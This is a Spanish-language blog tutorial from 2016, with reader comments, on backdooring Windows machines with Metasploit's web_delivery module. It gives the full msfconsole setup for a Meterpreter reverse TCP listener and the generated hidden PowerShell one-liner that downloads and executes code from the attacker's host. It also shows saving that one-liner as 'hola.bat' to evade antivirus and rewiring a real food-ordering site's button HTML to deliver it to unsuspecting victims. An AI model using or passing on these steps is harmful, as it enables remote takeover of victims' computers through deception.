sábado, 12 de noviembre de 2016

Backdorizando Windows por medio de Web Delivery - Metasploit

Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell,  en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.

Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:


--------------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery
LHOST => 192.168.1.35                              - Nuestra IP
LPORT => 8081                                           - Nuestro puerto de escucha
msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor
msf exploit(web_delivery) > show targets  
msf exploit(web_delivery) > set target 2     - Escogimos 2 = PowerShell

msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit

--------------------------------------------------------------------------------------------------------------------------------
una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo


powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://192.168.1.35:8080/yfHKAPLfG');

Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.





Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.

¿Ustedes se preguntaran porque?

Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón. 

Antes de pasar este proceso, activen su servidor apache:

root@kali:/# service apache2  start



Les dejare un pequeño ejemplo:

Source original:

<input name="input" value="" onclick="setLocation('http://www.bembos.com.pe/promociones-online/promo-clasica')" type="button">

Source editado

<input name="input" value="" onclick="setLocation('192.168.1.35/hola.bat')" type="button">

solamente le reemplazan la URL original por su dirección de archivo.

Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.

Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor  "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.








Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.


Saludos y éxitos!


3 comentarios:

  1. realmente sorprendente tu manera de pensar , "La curiosidad del ser humano ..." , si hay gente que abre una secuencia de scripts sin saber lo que contiene merece ser hackeado.

    ResponderEliminar
    Respuestas
    1. No solamente el que ejecute un script, si no también el que no actualice su sistema.

      Eliminar
  2. no se trata de ser merecido o no es un objetivo y un reto a la vec y la imajinacion es un privilegio

    ResponderEliminar